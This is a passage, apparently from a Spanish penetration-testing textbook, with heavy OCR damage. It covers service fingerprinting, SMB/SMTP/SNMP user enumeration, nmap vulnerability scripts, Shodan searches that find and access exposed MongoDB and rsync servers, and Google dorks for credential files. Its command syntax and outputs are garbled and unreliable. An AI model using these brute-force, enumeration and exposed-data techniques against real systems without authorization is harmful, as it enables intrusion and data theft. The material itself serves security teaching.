para  comprometer  la  seguridad  de  un  sitio  web.  Por  esta  razon  se  debe  emplear  tiempo  en  realizar 
^^^yfingerprint  web  exhaustive.  Para  llevar  a  cabo  esta  operativa  se  pueden  utilizar  herramientas 
como  BlindElephant,  la  cual  permite  disponer  de  un  listado  de  plugins  de  Drupal  y  Wordpress.  La 
herramienta  Nikto,  Plecost.  WPScan,  especializadas  en  Wordpre.ss,  o  JoomScan,  especializada  en 
•loomla. 
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Sera  importante  disponer  de  un  listado  de  plugins  actualizados,  ya  qiie  estos  CMS  se  acUializan 
practicaiiiente  cada  dia,  y  es  necesario  disponer  de  un  listado  actualizado  para  que  las  pruebas  scan 
mas  cercanas  a  la  realidad. 

Como  apunte  decir  que  Nikto  es  integrable  con  Cl  framework  de  intrusion  Metasploit,  lo  cual  le  da 
un  plus  muy  alto  a  la  hen*amienta.  Ademas,  Nikto  va  un  paso  mas  alia  y  realiza  muchas  mas  acciones 
aparte  de  la  identificacion.  Con  Nikto  se  pueden  realizar  los  siguienles  test: 

-  Deteccion  de  archives  j  ugosos  o  juicy  files. 

-  Ataques  de  inyeccion. 

-  Pruebas  de  DoS. 

-  Descubrimiento  de  informacion  y  errores  en  la  configuracion  del  servidor. 

-  Remote  File  Inclusion. 

-  SQL  Injection. 

-  Ejecucion  de  comandos  remota. 

-  Identificacion  de  sqfhvare. 

Como  se  puede  entender  Nikto  es  una  herrarnienta  que  hace  bastante  mas  que  uw  fingerprinting, 
aunque  tambien  real  ice  estas  tareas. 

Como  fingerprinting  a  otros  servicios  que  pueden  ser  identificados  se  exponen  algunos  ejemplos 
en  estc  apaitado.  Hay  que  tener  claro  que  exisle  diversidad  de  sei-vicios  para  los  cuales,  en  un  alto 
porcentaje,  su  fingerprinting  sigue  el  misino  patron.  A  continuacion  se  enumeran  algunos  servicios 
que  se  detallaran  en  lineas  posteriores: 

-  SMB,  Server  Message  Blocks  el  cual  proporciona  un  sistema  de  archivos  comun  o 
compartido  entre  maquinas.  Es  utilizado  principalmcnte  en  entornos  Microsoft  Window^s, 
aunque  tiene  su  protocolo  compatible  en  entoiTios  '^NIX  a  traves  de  samba. 

-  SMTP,  Simple  Mail  Transfer  ProtocoL  permite  el  intercambio  de  mensajes  de  con'eo 
electronico  entre  equipos.  Puede  resultar  muy  util  realizar  wn fingerprinting  sobre  este  tipo  de 
protocolo  para  obtener  informacion  que  pueda  ser  utilizada  posteriormente. 

SNMP,  Simple  Network  Management  Protocol,  permite  el  intercambio  de  intormacion 
de  administracion  entre  dispositivos  de  red.  Con  este  protocolo  los  admin istradores  pueden 
supervisar  ciertas  acciones  de  la  red  y  toda  la  intbmiacion  que  puede  proporcionar  al  auditor 
puede  ser  muy  util  en  el  pentest. 

El  protocolo  SATB  dispone  de  una  arquitectura  cliente-servidor,  donde  el  cliente  realiza  peticiones 
y  el  servidor  responde  olorgando  los  recursos  necesarios.  Se  pueden  utilizar  distintas  heiTamientas 
para  conseguir  infonnacion  sobre  el  protocolo.  La  primera  que  se  estudia  es  .AccCheck  y  nhtscan. 
Estas  herramientas  se  encuentran  disponibles  en  suites  de  seguridad  como  Kali  Linux. 

La  heiTamienta  nbtscan  es  una  heiTamienta  que  realiza  un  scan  en  una  red  local  o  remota  en  busca  de 
servidores  netbios  abiertos.  Realiza  una  funcionalidad  similar  a  la  hen*amienta  nbtstat  en  Windows 
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pero  operando  en  un  rango  de  direcciones  variable.  Un  ejemplo  de  iiso  seria  nbtscan  r  <direcci6n 
IP>. 

La  herrarnienta  AccCheck  pemiite  realizar  conexiones  con  los  recursos  JPC$  y  ADMINS  y  probar 
la  combinacion  de  usuarios  y  contrasehas  que  se  reciben  de  un  diccionario,  previamente  indicado. 
La  sintaxis  es  sencilla  accclieck.pl  -t  <direcci6n  1P>  [<opciones>j .  Como  opciones  se  tiene  la 
por3ibilidad  de  utilizar  diccionario,  indicar  un  usuario  concreto  o  dejar  el  administrador  por  defecto, 
etcetera. 

El  protocolo  SMTP  utiliza  distintos  parametros  para  comunicarse  entre  el  cliente  y  el  servidor.  Uno 
de  los  metodos  utilizados  para  realizar  la  prueba  de  usuarios  existentes  consiste  en  la  utilizacion  de 
los  siguientes  parametros  VRFY  y  EXPN.  El  primer  parametro  pennite  verihear  la  existencia  de  un 
usuario  en  un  servidor,  el  cual  devuelve  como  respuesta  el  nombre  y  el  buzon  de  correo  del  mismo. 
El  servidor  puede  no  aceptar  la  peticion,  pero  si  la  acepta  puede  contestar  con  un  codigo  250,  251 
0  252,  dependiendo  si  la  direccion  es  valida,  reenviada  o  desconocida.  El  codigo  550  indica  que  la 
dircccion  no  existe,  por  lo  que  el  servidor  rechazara  cualquier  mensaje  hacia  dicha  direccion. 

Otra  via  interesante  para  conseguir  nombres  de  usuarios  sin  utilizar  los  parametros  anteriores  es 
mediante  las  cabeceras  RCPT  TO.  El  servidor  debe  responder  con  un  codigo  de  control  a  cada 
peticion  RCPT.  Las  henvamientas  SMTP-user-enum  y  neat  permiten  llevar  a  cabo  estas  operaciones 
con  el  fin  de  conseguir  enumerar  usuarios.  Con  neat  se  establece  la  comunicacion  con  el  servidor  de 
correo  manualmente. 

Un  ejemplo  de  uso  seria  el  siguiente:  el  auditor  ejecuta  neat  [-SSL]  <direccidn  .servidor> 
<puerto>.  Despues  el  servidor  contesta  al  auditor  con  un  codigo  220  indicando  un  banner.  Despues 
sc  realiza  la  verificacion  de  usuarios  y  se  pueden  dar  diversos  casos,  con  los  distintos  codigos  que 
se  han  comentado  anterioiTnente.  Es  recomendable  realizar  la  tarea  manualmente.  ya  que  se  puede 
visual izar  todos  los  pasos  y  codigos  generados  en  el  proceso.  Con  esto  el  auditor  podra  saber  que 
csta  ocun-iendo  y  explotar  algun  error  o  comportamiento  no  deseado  en  el  sei-vidor.  Despues,  se 
puede  automatizar  el  proceso  con  la  heiTamienta  SMTP-user-enum. 

La  herrarnienta  smtp-user-enum  permite  especificar  el  metodo  de  consulta,  por  lo  que  si  .se  requiere 
preguntar  por  un  nombre  de  usuario  o  directamente  por  la  direccion  completa  .se  puede  configurar. 
Ademas,  se  puede  utilizar  un  diccionario  con  usuarios  o  con  direcciones  de  correo  electronico  para 
realizar  fuerza  bruta  en  la  enumeracion  de  usuarios.  A  continuacion  se  muestra  la  sintaxis  de  la 
herrarnienta  smtp-user-enum  [—M  VRFY\EXPN\RCPT] [  U  <diccionario.txt>  |  -u  <usuario>j  f-T 
<servidores.txt>\  -t  <direccidn  servidor>] . 

I'l.xisten  otras  herramientas  como  Swaks,  Medusa  o  modulos  de  tipo  auxiliaiy  de  Metasploit, 
au.xiliary/scanner/smtp/smtp_enum,  que  permiten  realizar  este  tipo  de  operaciones. 

El  protocolo  SNMP  dispone  de  tres  versiones,  donde  las  mas  implantadas  son  SNMPvl  y  SNMPmI. 
l:.n  estas  versiones  su  seguridad  esta  basada  en  una  palabra  conocida  como  nombre  de  comunidad.  La 
version  tres  del  protocolo  dispone  de  cambios  importantes  en  lo  que  a  la  seguridad  se  refiere.  Existe 
una  herrarnienta  denominada  snmpcheck  disehada  para  enumerar  la  informacion  de  administracion 
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de  red  una  vez  sea  identificada  la  direccion  IP.  A  continuacion  se  enumeran  los  parametros  de  la 
hen*aiTiienta: 

-  -t.  Para  fijar  la  direccion  IP. 

-  -p.  Para  fijar  el  pueito  donde  esta  el  sendcio. 

-c.  Para  fijar  el  nombre  de  comunidad.  Si  no  se  fija  por  defecto  se  utiliza  el  nombre/;z/Z^//r. 

-  -V.  Para  fijar  la  version  del  protocolo. 

Otra  hen'ainienta  para  realizar  una  enumeracion  de  SNMP  es  el  modulo  de  Metasploit  auxiliaiy/ 
scanner/sfimp/snmp_emim. 


PoC:  Nmap  +  scripts 

En  esta  prueba  de  concepto  se  muestra  el  poder  que  tiene  la  herrainienta  nmap  y  su  motor  de  scripting 
propio.  Este  motor  proporciona  al  auditor  la  posibilidad  de  generar  scripts  que  realicen  una  serie 
de  acciones  propias  de  i\w  fingerprinilng  mas  avanzado,  o  con  un  mayor  enfoque  hacia  un  punto 
concrete  del  proceso. 

Ademas,  estos  scripts  permiten  realizar  otras  acciones  distintas  al  auditor,  pero  que  estan  lelacionadas 
con  el  pentesting.  La  posibilidad  de  realizar  pruebas  de  SQL  Injection,  Cross  Site-Scripting,  pruebas 
de  estres  a  servicios,  fuerza  bruta,  deteccion  de  vulnerabilidades,  entre  otras  niuchas  caracteristicas 
hacen  que  este  motor  pueda  ser  realmente  util  en  un  proceso  de  auditoria. 

En  la  siguiente  direccion  URL  http://nmap.org/nsedoc/  se  pueden  encontrar  toda  la  documentacion 
y  scripts  disponibles  para  el  motor  de  nmap.  La  documentacion  esta  muy  bien  generada  con  algunas 
pruebas  que  pueden  ayudar  a  la  comprension  general  del  plugin. 

Ademas,  existen  varias  librerias  que  pueden  ser  utilizadas  por  el  motor  para,  una  vez  mas,  ampliar 
las  funcionalidades  y  que  puedan  ser  utilizadas  por  los  desarrolladores. 

Existen  diversas  categorias  para  clasificar  los  tipos  de  scripts  que  se  pueden  encontrar  en  este  pequeno 
gran  almacen  de  funcionalidades  para  nmap.  A  continuacion  se  listan  las  diferentes  categorias: 

-  Autenticacion. 

-  Fuerza  bruta. 

-  Configuraciones  por  defecto  y  broadcasts. 

-  Descubrimiento. 

Denegacion  de  servicio. 

Exploiting. 

Ataques  extemos  e  intrusivos. 

-  Malware. 

-  Deteccion  de  versiones  y  vulnerabilidades. 
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El  objetivo  de  la  prueba  de  concepto  es  mostrar  algiinos  scripts  que  pueden  resultar  de  gran  interes 
en  un  proyecto  de  auditoria  de  seguridad,  y  que  el  lector  pueda  entender  el  potencial  que  tienc  esta 
extension  del  escaner. 

Uno  de  los  primeros  ejemplos  de  scripts  de  nmap  es  el  de  identificacion  de  banner  o  banner  grabber. 
La  sintaxis  para  lanzar  este  script  es  la  siguiente: 

nmap  [parcimetros]  -script  banner  < targe t>. 

En  la  documentacion  de  los  .scripts  se  puede  visualizar  que  existen  diversos  argumenlos  que  se 
pueden  pasar  al  propio  script  para  realizar  un  analisis  mas  exhaustivo  o  afinado.  Para  introducir  los 
argiimentos  al  script  se  utilizara  la  siguiente  sintaxis: 


nmap  [parametros]  -script  banner  —script-args^<argumentos>. 


A  continuacion  se  puede  visualizar  una  imagen  en  la  que  se  muestra  una  ejecucion  de  nmap  con  la 
coiifigura  del  script  basico  de  identificacion  de  servidores  web  por  medio  de  la  caplura  del  banner 
que  ofrece. 


U:\>nnap  -sU  — sci'ipt=bannei' 

Starting  Nmap  6-25  <  http://nmap.org  )  at  2014-03-28  10:54  Hora  estpndai'  romance 

•^map  scan  report  for  highsec.es  <MMMiS.2?.75> 
tost  is  up  <0.040s  latency>- 
rDNS  record  for  7 - 75  : 

^ot  shown:  995  filtered  ports 
PORT  STATE  SERUICE  UERSION 

21/tcp  open  ftp  ProFTPD  or  KnFTPD 

!_banner:  220  FTP  Seruer  ready-  n  o 

22/tcp  open  ssh  Linksys  WRT45G  modified  dropbear  sshd  <protocol  2.0> 

l_banner:  SSH-2 -0-OpenSSH 
80/tcp  open  http? 

8i/tcp  open  hosts2-ns? 

443/tcp  open  https? _ _ _ 

Fig.  2.15:  Banner  grabber  con  nmap. 


Giro  ejemplo  de  .script  interesante  que  se  puede  estudiar  y  probar  contra  un  servidor  web  es  el  de 
SSL  Cert.  Con  este  tipo  de  script  se  puede  analizar  la  seguridad  que  ofrece  el  ceitificado  digital  de 
un  sitio  web,  como  por  ejemplo  que  tipo  de  protocolo  SSL  soporta,  o  si  los  algoritmos  de  firma  y/o 
cifrado  que  se  utilizan  son  debiles. 

Esta  infonnacion  pennite  realizar  un  analisis  de  los  ceilificados  de  un  sitio,  y  poder  llegar  a 
conclusiones  interesantes,  como  que  un  certificado  es  vulnerable  a  TLS  Renegotiation,  si  esta 
firmado  con  un  algoritmo  inseguro  como  MD4,  o  si  esta  firmado  por  una  entidad  certificadora  de 
confianza  o  es  un  selft -signed. 

Para  llevar  a  cabo  este  estudio  o  prueba  se  pueden  concatenar  el  lanzamiento  de  scripts.,  tal  y  como 
sc  puede  visualizar  en  la  imagen.  Algunos  de  los  scripts  que  estan  disponibles  para  realizar  la 
evaluacion  de  la  capa  de  cifrado  SSL  en  un  servidor  web  pueden  ser,  por  ejemplo,  alguno  de  la  lista 
siguiente:  ssl-cert,  ssl-date,  ssl-enum-ciphers,  ssl-known-key,  sslv2,  etcetera. 
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nmap  -p443  -T4 —script  sslvZ^ssl-enum-ciphers^^^^^^^^ 

Nmap  Output 

Ports  /  Hosts 

Topology 

Host  Details 

Scans 

nmap  -p  443  -T4  --script  ssIvZ^ssl-enum-ciphers  ahqzwfw.com  |  v 


Starting  Nmap  6.40  (  http://nmap.org  )  at  2014-03-19 
Romance  Standard  Time 

Nmap  scan  report  -For  ahqzwtw.com  (116-117.23-237) 
Host  is  up  (0.35s  latency). 

PORT  STATE  SERVICE 
443/tcp  open  https 
I  ssl-enum-ciphers : 

I  SSLv3: 

I  ciphers: 

I  TLS_RSA_WITH_3DES_EDE_CBC_SKA  -  strong 

I  TLS_RSA_WITH_AES_128_CBC_SHA  -  strong 

1  TLS_RSA_WITH_AES_256_CBC_SHA  -  strong 

I  TLS_RSA_WITH_DE5_CBC_5HA  -  weak 

I  TLS_R5A_WITH_IDE.A_CBC_SHA  -  weak 

I  TL5_RSA_WITH_RC4_12S_KD5  -  strong 

I  TLS_RSA_WITH_RC4_12B_SHA  -  strong 

I  compressors: 

I  DEFLATE 

I  NULL 

I  TLSvl.01 
I  ciphers; 

I  TLS_RSA_WITH_3DES_EDE_CBC_5HA  -  strong 

I  TLS_R5A_WITH_AES_128_CBC_SHA  -  strong 

i  TL5_RSA_WITH_AES_256_CBC_SHA  -  strong 

j  TLS_RSA_WITH_DES_CBC_SHA  -  weakj 

I  TLS_RSA_WITH_IDEA_CBC_SHA  -  weak 

I  TL5_RSA_WITH_RC4_128_MD5  -  strong 

1  TLS_RSA_WITH_RC4_128_SHA  -  strong 

I  compressors: 

1  DEFLATE 

1  NULL 

least  strength:  weak _ 

Fig.  2.16:  Analisis  de  SSL  con  nmap. 


Para  finalizar  esta  prueba  de  concepto  se  hablara  del  protocolo  SMB.  Existen  diversos  scripts  que 
penniten  comprobar  el  estado  y  la  seguridad  del  protocolo  SMB  en  las  maquinas  objetivo  gracias  a 
varios  codigos  referentes  a  este  protocolo. 

Como  ejemplos  se  pueden  encontrar:  smb-brute,  sinb-check-viilns,  snib-enitm-domaim,  siiib-emwi- 
domains,  smb-emim-groiips,  smb-fiood,  smb-ls,  smb-psexec,  smb-server-stats,  smb-seciirity-mode, 
etcetera.  Como  se  puede  comprender  existen  diversos  scripts  que  realizan  un  analisis  proflindo  del 
protocolo  en  las  maquinas  remotas. 
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En  la  siguiente  imagen  se  puede  visualizar  un  pequeno  ejemplo  de  invocacion  de  scripts  relacionados 
con  el  protocolo  enunciado. 

nmap  -sV  -T4  -v  —script  smb-check-vulns^smb-enum-shares  --script-args  unsafe=1^^||HlHII 

i39/tcp  open  netbios-ssn 
445/ tcp  -ilte-ed  n‘ic'‘C50-t-ds 
5631/tcp  open  pcanywheredata? 

Service  Info:  OS;  Windov/s;  CPE:  cpe : /o : microsoft : windows 

I 

Host  script  results: 

I  smb-check- vulns : 

I  MS08-067:  NOT  VULNERABLE 

I  Conficker:  Likely  CLEAN 

I  regsvc  DoS:  NOT  VULNERABLE 

I  SMBv2  DoS  (CVE-2009-3103) :  VULNERABLE 

I  MS06-025:  NOT  VULNERABLE 

|_  M507-029:  NO  SERVICE  (the  Dns  Server  RPC  service  is  inactive) 

smb-enum-shares : 


ADMINS 

Anonymous  access:  <none> 
Current  user  ('guest')  access: 

<none> 

C$ 

Anonymous  access:  <none> 
Current  user  ('guest')  access: 

<none> 

DS 

Anonymous  access:  <none> 
Current  user  ('guest')  access: 

<none> 

G$ 

Anonymous  access:  <none> 
Current  user  ('guest')  access: 

<none> 

HOTEL 

Anonymous  access:  <none> 
Current  user  ('guest')  access: 

READ/WRITE 

IPC$ 

Anonymous  access:  READ  <not  a  tile  share> 

Current  user  ('guest')  access:  READ  <not  a  -File  share> 

Fig.  2. 1 7:  Analisis  dc  SMB  con  nmap. 


PoC:  Shodan 

En  esta  prueba  de  concepto  se  presenta  el  servicio  Shodan  como  fuente  de  infonnacion  para 
encontrar  vias  de  ataque  sobre  ciertas  organ izaci ones  a  traves  de  una  configuracion  inapropiada  en 
los  ser\'icios  de  esta.  Ademas,  con  Shodan  se  puede  encontrar  paneles  abiertos,  encontrar  servidores 
y  versioncs  de  servicios,  en  general,  realizar  un  tipo  dt  fingejprinting  pasivo. 

Para  ejemplificar  lo  que  se  puede  encontrar  con  Shodan  se  va  a  proceder  a  realizar  una  busqueda 
para  encontrar  servidores  que  ofrecen  el  servicio  MongoDB.  La  idea  es  verificar  si  el  servicio 
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MongoDB  puede  ser  accesible  dcsde  el  exterior,  y  si  este  dispone  de  contrasena,  ya  que  por  delecto 
SLi  iiTiplantacion  no  exige  una  contrasena  para  acceder  a  los  datos. 

En  la  imagen  se  puede  visualizar  como  se  realiza  la  biisqueda  de  los  servidores  MongoDB  con 
Shodan. 


t SHODAN  j 

Home  Search  Directoiy  Date  Analytics/ Exports  Dewloper  Center  Labs 


,  Vote  J»  Export  Data 

Top  Countries 

United  States  26.005 

China  12.026 

Russian  Federation  4.941 

Germany  3,\j95 

United  Kingdom  2.258 


38.127.113.218 

Cogent  Communication 

^  Miami 
Details 


MongoDB  Server  In format  Lon 
< 

"backgr-oundF  lush  Ing":  t 

"  last^f  in  ished";  '’2014-03-23116;  19:46. 766000” 

”last-_Ms”:  2, 

"flushes”:  S3066, 

"au€r3g€_r-is" ;  6 . 3262S27 1 4949553 , 

"t  ot  3 l_M5" :  442433 

"connections":  f 
"cur-r-ent";  Ilf 
"aoa Liable":  199S9 

>f 

"uptime":  4934120.0. 

"ok";  1.0, 

"network";  f 
"nunP.equests":  5033, 

"bytesOut";  1335343, 

"by tea In":  1093725 

>, 

"opcounters";  -C 


FitJ  7  18:  Rii^oueda  de  s 


ci'rvif'U'v's 


X.fnncrnDH 


Una  vez  encontrados  los  servicios  que  se  reqiiieren  se  prueba  la  conexion  a  estos.  En  la  mayoria 
de  los  casos  la  logica  dice  que  estaran  protegidos.  pero  siempre  se  debe  probar,  ya  que  en  muchas 
ocasiones  puede  haber  sorpresas. 

Mediante  el  uso  de  la  herramienla  MoiigoVUE  se  realiza  la  conexion  al  servicio,  ante  la  soipiesa 
del  auditor  se  accede  a  los  datos  del  servicio.  pudiendo  encontrar  colecciones  con  contrasenas  y 
usuarios,  entre  otros  inuchos  datos.  Esto  quiere  decir  que  gracias  a  Shodan  se  puede  encontrar 
servicios  desprotegidos  accesibles  desde  Internet,  mucho  mas  a  menudo  de  lo  que  se  puede  creei  en 
un  principio.  Shodan  puede  ser  utilizado  para  encontrar  puntos  debiles  en  infraestructuras  cnticas, 
ya  que  este  tipo  de  infraestructuras  no  se  encuentran  muy  protegidas  actualmente.  Gracias  a  Shodan, 
en  diversas  conferencias  se  ha  puesto  en  entredicho  lo  comentado  antei  iormente. 
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Create  new  Connectio.n 


MongoDB  Connection 


Settings  SSH  Tunnel 


Enter  basic  settings: 

Name: 

Server 

Port  |Z7017  ] 

Username:  [ 

Success 

Passwi 


Shodan  Demo 
!«1 27.1 13.21 8 


Database 


Connection  established  successfully 


Fig.  2.19:  Conexion  a  MongoDB. 


El  segundo  ejemplo  que  se  quiere  presentar  con  el  uso  del  sendcio  es  el  acceso  a  los  datos  de  un 
servidor  con  rsync  activo.  Para  realizar  la  busqueda  con  Shodan  se  puede  llevar  a  cabo  como  se 
muestra  en  la  siguiente  imagen. 


Fig.  2.20:  Busqueda  dc  rsync  en  Shodan. 


Una  vez  encontrados  los  servicios  que  son  accesibles  publicamente  se  puede  comprobar  la  seguridad 
y  verilicar  que  se  puede  conectar  directamente  a  rsync.  En  el  ejemplo  sc  puede  visualizar  como  se 
lisla  los  archivos  disponibles. 
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WVIW 

ftp 


PostBlogRandonT 


PostBlogRandon 


drv/xr-xr-x 
-rw-r--r-- 
-rw-r--r-- 
rw- r- - r- - 

-  rw- r- - r- - 

-  rw- r-- r- - 
-rw-r--r-- 

-  rw- r- - r- - 

-  rw- r- - r- - 

-  rw- r- - r- - 


rsync  rsync:// 
FTP 

rsync  rsync:// 
4096  2014/01/20 
365  2010/10/29 
23776  2014/01/20 
47138  2014/01/20 
27227  2014/01/20 
26605  2014/01/20 
39436  2014/01/20 
1150  2012/10/05 
25619  2014/01/20 
36485  2014/01/20 


/WWW 

14:43:27  . 

21:06:02  .htaccess 
13:24:18  about -website . html 
13:23:22  about. html 
13:24:10  contact . html 
13:24:03  downloads.html 
13:24:14  events.html 
08:21:00  favicon. ico 
13:24:19  index.html 
13:24:13  licensing.html 


Fig.  2.2 1 :  Datos  a  traves  de  rsync. 


2.  Google  y  cia 

Los  motores  de  busqueda  aportan  gran  cantidad  de  informacion  a  la  luimanidad.  aunqiie  en  algunas 
ocasrnes  se  pueden  realizi-  busquedas  eon  un  toque  malicioso.  Los  motores  mdexan  todo  Upo  de 
informacion,  los  bots  de  Google.  Bing.  Yahoo  no  desprecian  nmgun  tipo  de  contemdo,  poi  lo  que  a 
no  ser  que  se  especifique  en  el  fichero  robols.txl  los  motores  capturaran  las  dnecciones  URL. 

Este  hecho  puede  ser  uti  I  izado  en  un  proceso  dgfoolprinling  y  fingerprinling  pai  a  recabai  intonnacion 
soTre  un  objetivo.  Es  mas,  podria  .ser  utilizado  en  diversos  tipos  de  auditortas,  no  centrandose 
solamente  en  la  auditoria  web.  Porejemplo,  para  el  punto  de  partida  de  un  ataque  dnigido  puede 
clave  conocer  habitos  de  una  persona. 

La  GHDB.  Google  Hacking  Database,  es  un  repositorio  con  gran  cantidad  de  busquedas  que 
se  pueden  realizar  en  Google,  y  es  extensible  a  otros  motores  ya  que  utdizan  comandos  o  dorks 

similares,  por  ejempio  Bing. 

Con  estas  busquedas  avanzadas  se  pueden  encontrar  datos  confidenciales  de  servidores  que 
se  encuentran  piiblicos  y  accesibles  desde  Internet,  por  ejempio  por  un  etroi  del  admimstrador. 
Otros  datos  de  interes  que  se  pueden  encontrar  son  fieheros  de  configuracion.  nombres  de  usuar.o 
y  persona,  acceso  a  camaras,  impresoras,  rutas  intemas,  credenciales,  etcetera.  ,  con  inuac 


Dork  /  Operador 

Descripcion 

Una  sentencia  buscada  entre  comillas  sera  buscada  literalmente 

- 

Con  este  operador  se  consiguen  excluir  palabras  de  la  busqueda  ^ 
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Dork  /  Operador 

Descripcion 

+ 

Con  este  operador  se  consigue  anadir  palabras  que  Google  generalmente  no 

incluve  en  las  busquedas,  por  ejempio  ‘"el”,  “la”,  etcetera. 

link 

Lista  todos  los  enlaces  que  apunten  al  sitio  web.  Ejempio:  link:“sitio.com” 

site 

Permile  listar  solo  informacion  de  un  sitio  en  concreto.  Ejempio:  site:sitio. 

com 

info 

Muestra  informacion  sobre  el  dominio  principal 

cache 

Muestra  la  pagina  que  tiene  Google  cacheada 

filetype 

Pennite  realizar  busquedas  por  tipo  de  archivos.  Ejempio:  filetype:pdf 

allinURL 

Permite  mostrar  paginas  indexadas  de  un  dominio  o  paginas  que  tienen  cn 

su  direccion  URL  las  palabras  indicadas.  Ejemplo:sitio.com 

allintitle 

Permite  mostrar  paginas  indexadas  que  tienen  en  el  titulo  las  palabras  que 

se  pasen.  Eiemplo:palabral  palabra2 

allintext 

Se  muestran  paginas  que  contengan  todas  las  palabras  en  el  contenido  de 

un  sitio. 

intext 

La  busqueda  se  realiza  para  encontrar  sitios  que  contengan  las  palabras 
buscadas  en  el  texto  proporcionado  por  la  propia  pagina.  Ejempio  intext'. 
“En  un  lugar  de  la  Mancha” 

in  URL 

La  busqueda  se  realiza  para  encontrar  sitios  que  conticncn  las  palabras 

buscadas  en  la  direccion  URl..  Ejempio  inURL:<idmir\ 

intitle 

La  busqueda  se  realiza  para  encontrar  sitios  que  contienen  las  palabras 

buscadas  en  el  titulo  del  sitio.  Ejempio  intitle:admin 

Tabla  2.01:  Algunos  darks  de  Google. 


A  conlinuacion  se  muestran  algunos  dorks  de  ejempio  ulilizados  por  Bing\ 


Dork  /  Operador 

Descripcion 

contains 

Con  este  comando  la  busqueda  se  centra  en  mostrar  paginas  que  contengan 
vinculos  a  los  archivos  que  se  especifiquen 

ext 

Se  devLielven  paginas  con  la  extension  de  archivo  que  se  especifique 

ip 

Devuelve  sitios  que  se  encuentren  alojados  en  la  direccion  IP  especificados. 
Es  util  para  visualizar  hosts  compaitidos 

language 

Devuelve  sitios  con  el  idioma  concreto  que  se  especifique 

feed 

Realiza  una  busqueda  que  contiene  una  fiiente  RSS  o  Atom  con  los  terminos 
que  se  especifiquen 

URL 

Se  comprueba  si  la  direccion  URL  indicada  se  encuentra  en  el  moiox  Bing 

Tabla  2.02:  Algunos  dorks  dc  Bing. 
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Existen  diversas  fiientes  donde  encontrar  dovks^  aunque  conociendo  los  comandos  se  pueden  obtener 
nuichos  resiiltados  interesantes  que  provoquen  desde  una  fuga  de  informacion  hasta  una  intrusion 
al  sisiema.  Una  de  las  ftientes  de  GHDB  es  el  espacio  que  proporciona  el  sitio  web  Exploit- 
DB.  En  la  siguiente  direccion  URL  http:/lw\v\\\exploit-db.com/google-dorks/  se  piiede 
encontrar  los  ultimos  dorks  subidos  por  los  usuarios  y  lo  que  se  ha  conseguido  con  ellos.  Ademas, 
proporciona  una  clasificacion  que  esta  especificada  en  las  siguientes  categorias: 

-  Usuarios  contenidos  en  ficheros. 

Directorios  sensibles. 

-  Deteccion  de  servidores  web. 

-  Archivos  jugosos. 

Servidores  vulnerables. 

-  Mensajes  de  error, 

-  Archivos  que  contienen  credenciales. 

rrr - —7"^ - 3 - 

Files  containing  passwords 

PASSWORDS,  for  the  LOVE  OF  GOD!!'.  Google  found  PASSWORDS! 

«  prev  123456789  next  » 


DATE 

Title 

Summary 

2014- 

03-31 

inurl:/ backup  intitlerindex  of  backup 
intext: 'sql 

Google  5earch:https: //WWW. google. com/search? 
client=opera8tq=admin+username-^and+passEsour. . . 

2013- 

11-25 

filetype: password  jmxremote 

Passwords  for  Java  Management  Extensions  (JA\X  Rei 
Java  Vi... 

Fig.  2.22: 

Ejcmplo  de  GHDB. 

3.  Creadon  del  mapa  de  informacion 

En  todo  el  proceso  coinentado  hasta  el  momento  se  puede  entender  que  el  volumen  de  informacion  es 
muy  grande.  Si  el  proceso  dt  foot  printing  y  fingerprinting  es  demasiado  profundo  quiza  se  necesite 
tecnologia  Big  Data  para  almacenar  la  infomiacion  y  poder  analizarla  coiTectamente. 

Muchas  personas  piensan  que  esta  Ease  no  es  de  gran  utilidad,  pero  realinente  se  puede  encontrar 
informacion  valiosa  a  la  hora  de  encarar  el  pentest.  Es  cierto  que  existe  una  gran  cantidad  de 
infomiacion.  y  que  se  debe  analizar  para  aprovecharse  de  lo  mas  importante.  Para  llevar  a  cabo  esta 
accion  se  puede  realizar  un  modelado  de  datos  para  analizar  de  manera  mas  eficiente  la  informacion. 
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La  clasificacion  de  informacion  es  otra  de  las  vias  imprescindibles  para  obtener  datos  de  i uteres,  y 
tener  una  idea  clara  de  que  vector  de  ataque  puede  ser  interesante  comprobar. 

El  servicio  de  pentesting  persistente  denominado  Faast  pemiite  a  los  usuarios  obtener  un  mapa  de 
informacion.  El  seiwicio  se  centra  en  la  fase  de  discover  y  permite  al  usuario  obtener  un  mapa  de 
activos  de  la  organizacion  que  requiere  el  pentest.  Ademas,  cubre  otras  Eases  del  pentest  como  son 
el  analisis  y  la  explotacion. 

En  la  siguiente  imagen  se  puede  visual  izar  el  mapa  de  activos  que  presenta  el  servicio,  aunque  en  este 
caso  solo  existe  un  dominio.  Si  el  dominio  base  del  proyecto  tuviera  gran  cantidad  de  subdominios 
el  servicio  indicaria  que  elementos  se  han  ido  encontrando  por  cada  subdominio. 


Mapa  de  Activos  j  ner'-'  ■ 

demofaast.elevenpadns.com 
Dominio  (1) 

demofaai:,e!«venpa"h5.cam  Gf 
Direcciones  IP  f*  '; 

I  68.63.36.23q  C? 

Puerto  (4) 

9002  C? 

8C  C? 

5986  or 
6i16C  Gf 

Servicios  de  red  (2; 

HTTP  Gf 
HTTPS  C? 

Ruta  interna  [56] 


Sistema  operative  (2) 

MicrosoT  Vvandovvs  Server  2C0S  ^32  or  Windows  S  Gf 

Windows  NT  WEB*pak:e  6.2  buifo  9200  (Unknown  Windows  version  Srandard  Edition)  I5S6  Gf 
URLs  (1659) 


Fig.  2.23:  Presenlacion  dc  activos  en  un  mapa  de  informacion. 


(’.Que  lipo  de  elementos  son  los  que  se  presenta?  A  continuacion  se  muestra  un  listado  de  elementos 
que  pueden  ser  analizados  y  encontrados  con  el  servicio: 

-  Direcciones  IP. 

-  N ombres  de  dominio. 

“  Servicios  de  red  y  puertos  asociados. 
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-  Sisteinas  operativos  encontrados. 


URL.  Se  dcselosan  en  rutas  de  directorios,  direcciones  URL 


{GET  y  POST). 


-  Metadatos  encontrados. 

-  Usiiarios. 

-  Correos  electronicos. 

-  Versiones  de  Software  encontradas. 

-  Rutas  internas. 

-  Cookies. 

-  Vulnerabilidades,  recomendaciones  y  notificaciones. 


fit  ^icrivQS 


Metadatos 


-  <2aioa/2?ri4 1^1:41 


Ue  red  _scftv.'ure  D'ren:iones 


User  (9) 


!  ResuLtados 


Registros  por  pagina 


Buscar: 


Recurso 


Meradatos 


htco://demofa3st.elevenpaths.com;9002/meradata/218064€xamlnerrecruitmentguideapplicants.pdf  Copeland. 

^  Crov/on 


Steven 

(lELTS) 


http://demo'aast.elevenparhs.conn:9002/metadata/2524_danficauons_molL5erbia_23_^_2012.docx  yuksek 

